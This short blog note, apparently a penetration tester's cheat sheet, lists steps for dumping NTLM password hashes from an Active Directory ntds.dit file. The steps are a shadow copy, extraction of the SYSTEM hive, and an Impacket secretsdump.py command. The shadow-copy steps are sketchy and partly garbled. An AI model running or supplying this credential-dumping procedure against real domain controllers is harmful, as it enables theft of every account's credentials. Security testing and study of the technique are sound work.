notes

Dumping NTLM Hashes from ntds.dit

April 21, 2021 cache, hash, ad

Dumping NTLM Hashes from ntds.dit

Quick Note:

Create Shadow Volume

  • Copy %systemroot%\ntds.dit to C:\ntds.dit

  • Extract System system register

Using Impacket

python secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
More from notes